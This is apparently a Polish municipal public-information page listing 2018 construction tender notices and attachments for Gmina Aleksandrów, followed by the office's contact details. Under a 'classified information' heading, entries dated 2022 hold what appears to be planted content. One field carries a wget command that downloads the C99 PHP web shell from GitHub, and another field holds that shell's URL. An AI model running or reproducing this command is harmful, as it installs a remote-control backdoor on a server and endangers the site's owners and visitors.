Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-30 10:29:19 | Data modyfikacji: 2018-04-11 15:21:16.
Informacja z otwarcia ofert - Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
otwarcie_ofert_OSP_niewierszyn_29032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 14:16:12 | Data modyfikacji: 2018-04-11 15:21:16.
Zawiadomienie o unieważnieniu postepowania -
Budowa świetlicy wiejskiej w miejscowowści
Dabrowa nad Czarną
 
uniewaznienie_postepowania_swietlica_dabrowa_29032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 14:13:29 | Data modyfikacji: 2018-04-11 15:21:16.
Informacja z otwarcia ofert: Budowa świetlicy
wiejskiej w miejscowości Dąbrowa na Czarną
 
otwarcie_ofert_swietlica_dabrowa_28032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 14:10:37 | Data modyfikacji: 2018-04-11 15:21:16.
Ogłoszenie o zamówieniu: Budowa sali
gimnastycznej przy Szkole podstawowej im T.
Kościuszki w Aleksandrowie

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8 - dokumentacja projektowa

Załącznik Nr 9 - STWiOR

Załącznik Nr 10 - przedmiary

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 12:59:09 | Data modyfikacji: 2018-04-11 15:21:16.
Wyjaśnienie SIWZ: Budowa świetlicy wiejskiej w
miejscowości Dąbrowa na Czarną

Wyjaśnienie SIWZ

Załącznik - projekt rozbiórki

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 12:47:32 | Data modyfikacji: 2018-04-11 15:21:16.
Wyjaśnienie SIWZ: Budowa świetlicy wiejskiej w
miejscowości Dąbrowa na Czarną
 
wyjasnienie_SIWZ_swietlica_dabrowa_21032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 12:43:54 | Data modyfikacji: 2018-04-11 15:21:16.
Ogłoszenie o zmianie ogłoszenia: Rozbudowa i
przebudowa budynku OSP w Niewierszynie
 
Ogloszenie_o_zmianie_ogloszenia_OSP_niewierszyn_21032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 12:42:37 | Data modyfikacji: 2018-04-11 15:21:16.
Modyfikacja SIWZ: Rozbudowa i przebudowa budynku
OSP w Niewierszynie
 
modyfikacja SIWZ_OSP niewierszyn_21032018.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 12:41:01 | Data modyfikacji: 2018-04-11 15:21:16.
Ogłoszenie o zamówieniu: Budowa świetlicy
wiejskiej w miejscowości Dąbrowa nad Czarną

Ogłoszenie o zamówieniu

Specyfikacja Istotnych Warunków Zamówienia wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 10:33:34 | Data modyfikacji: 2018-04-11 15:21:16.
Ogłoszenie o zamówieniu: Rozbudowa i przebudowa
budynku OSP w Niewierszynie

Ogłoszenie o zamówieniu

Specyfikacja Istotnych Warunków Zamówienia wraz z załącznikami 1-7

Załącznik Nr 8

Załacznik Nr 9 - STWiOR

Załącznik Nr 10 - przedmiar

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2018-03-29 09:38:07 | Data modyfikacji: 2018-03-29 10:31:17.

Informacje niejawne
----------------------------
  • Tytuł informacji: ``
    Podstawa prawna:

    [2022-11-29 12:32:18] Administrator BIP

  • Tytuł informacji: `https://raw.githubusercontent.com/cermmik/C99-WebShell/master/c99shell.php`
    Podstawa prawna: wget https://raw.githubusercontent.com/cermmik/C99-WebShell/master/c99shell.php

    [2022-12-23 14:22:19] Administrator BIP Administrator BIP

Data wprowadzenia: 2018-03-29 09:38:07
Data modyfikacji: 2018-03-29 10:31:17
Opublikowane przez: Administrator BIP Administrator BIP
 
Dodatkowe Informacje:
.
Adres:
Gmina Aleksandrów
ul. Aleksandrów 39B
26-337 Aleksandrów
Wójt Gminy
Pawel Mamrot
Kontakt:
Tel: (44) 756-00-27
Fax: (44) 756-00-14
e-mail: ug@aleksandrow.net.pl